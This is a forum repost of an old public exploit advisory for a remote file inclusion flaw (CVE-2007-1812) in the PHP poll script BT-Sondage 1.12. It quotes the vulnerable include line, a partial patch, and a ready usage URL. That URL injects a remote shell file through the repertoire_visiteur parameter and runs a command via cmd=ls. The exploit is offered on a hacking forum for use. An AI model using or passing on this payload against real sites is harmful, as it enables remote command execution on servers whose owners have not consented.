Exploit BT-sondage 1.12 - 'gestion_sondage.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3624
Проверка EDB
  1. Пройдено
Автор
CRACKERS_CHILD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1812
Дата публикации
2007-04-01
Код:
--------------------------------------------------------------------------------


Title : BT-Sondage-v112 Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: [email protected]

--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  BT-Sondage
URL :  http://www.phpscripts-fr.net/scripts/download.php?id=1575

--------------------------------------------------------------------------------


dork        : Download Script :)
Exploit     :

--------------------------------------------------------------------------------

Vulnerable Codes .n gestion_sondage.php


include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{

--------------------------------------------------------------------------------


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


--------------------------------------------------------------------------------

greets: EveryBody :=)

--------------------------------------------------------------------------------

Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(

--------------------------------------------------------------------------------

# milw0rm.com [2007-04-01]
 
Источник
www.exploit-db.com